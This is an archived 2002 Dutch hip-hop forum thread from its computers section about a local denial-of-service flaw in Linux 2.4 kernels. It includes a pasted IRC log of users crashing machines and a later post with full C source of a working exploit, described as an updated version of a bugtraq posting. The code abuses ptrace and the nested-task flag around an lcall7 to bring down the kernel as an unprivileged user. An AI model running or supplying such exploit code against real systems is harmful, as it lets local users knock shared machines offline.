Deze site is tegenwoordig een archief over Nederlandse hiphop vroeger en krijgt geen updates meer. Zowel de site als forum zijn te tof geweest om niet online te houden.
Index   -   Actieve onderwerpen   -   Beleid   -   Zoeken   
 Index / [arch] Computers en Techniek /
creech
Limited Edition		 Gepost door creech op zaterdag 16-11-2002 om 23:57:52
18:38:42] <@tralalala> hmmz. alle linux kernels local DOSable
18:40:59] <@tralalala> http://smile/~jur/crash.c
18:41:02] <@tralalala> gcc crash.c
18:41:04] <@tralalala> ./a.out
18:41:12] <@tralalala> mijn compu dood
18:42:35] <@blaat> tralalala: sinds wanneer is dat?
18:42:45] <@tralalala> ongeveer 10 minuten
18:43:07] <@blaat> tralalala: werkt het als mortal user?
18:43:30] <@tralalala> YEP!
18:44:50] <@tralalala> sugg: untrusted local users tijdelijk dichtzetten
18:44:58] <@blaat> ja idd
18:47:18] <@blaat> OUCH!
18:50:47] <@blaat> klaboem stuk idd
18:50:54] > getest dus

einde van deze waarschuwing/mededeling

----------------------------------------
Sit jou kop in die koei se kont en wag tot die bull jou kom holnaai.
dap
038
 Gepost door dap op zondag 17-11-2002 om 00:39:17
Yep; the first version of the DoS I posted on bugtraq was defective and
worked only under special conditions (inside gdb for example).

However this updated version works much better:

#include <sys/ptrace.h>

struct user_regs_struct {
long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
long orig_eax, eip;
unsigned short cs, __cs;
long eflags, esp;
unsigned short ss, __ss;
};

int main( void )
{
int pid;
char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
void (* lcall7)( void ) = (void *) dos;
struct user_regs_struct d;

if( ! ( pid = fork() ) )
{
usleep( 1000 );
(* lcall7)();
}
else
{
ptrace( PTRACE_ATTACH, pid, 0, 0 );
while( 1 )
{
wait( 0 );
ptrace( PTRACE_GETREGS, pid, 0, &d );
d.eflags |= 0x4100; /* set TF and NT */
ptrace( PTRACE_SETREGS, pid, 0, &d );
ptrace( PTRACE_SYSCALL, pid, 0, 0 );
}
}

return 1;
}

At the beginning I thought only kernels <= 2.4.18 were affected; but it
appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
The flaw seems to be related to the kernel's handling of the nested task
(NT) flag inside a lcall7
Deathlock
FreeBSD Powered		 Gepost door Deathlock op zondag 17-11-2002 om 08:47:05
ach, zo is er bij elk OS wel wat

FreeBSD heeft laatst ook weer een aardige upgrade gehad. Wel maf overigens dat ze er nu pas achter zijn terwijl de code al langer op het internet te vinden was. Hopelijk fixen ze het snel.

----------------------------------------
"I have often regretted my speech, never my silence."
- Xenocrates (396-314 B.C.)
teigetje Gepost door teigetje op zondag 17-11-2002 om 12:30:35
Quote:

http://gathering.tweakers.net/forum/list_messages/647246/
"Die links duiden op een local probleem. Klopt dat?"
"Dat is zo."
"Dat scheelt veel. De weinige mensen die local access hebben op mijn machine doen dat gelukkig niet. Zo wel, maken ze kennis met mijn maatje 47"



/edit
URL maakte er een bende van
[ Dit bericht is gewijzigd door op 17-11-2002 @ 12:31:43 ]

----------------------------------------
Code #404: User not found
 Index / [arch] Computers en Techniek /
© 1998 - 2024 NLhiphop.nl. Alle rechten voorbehouden - All rights reserved. Parsed in 0.0161 sec.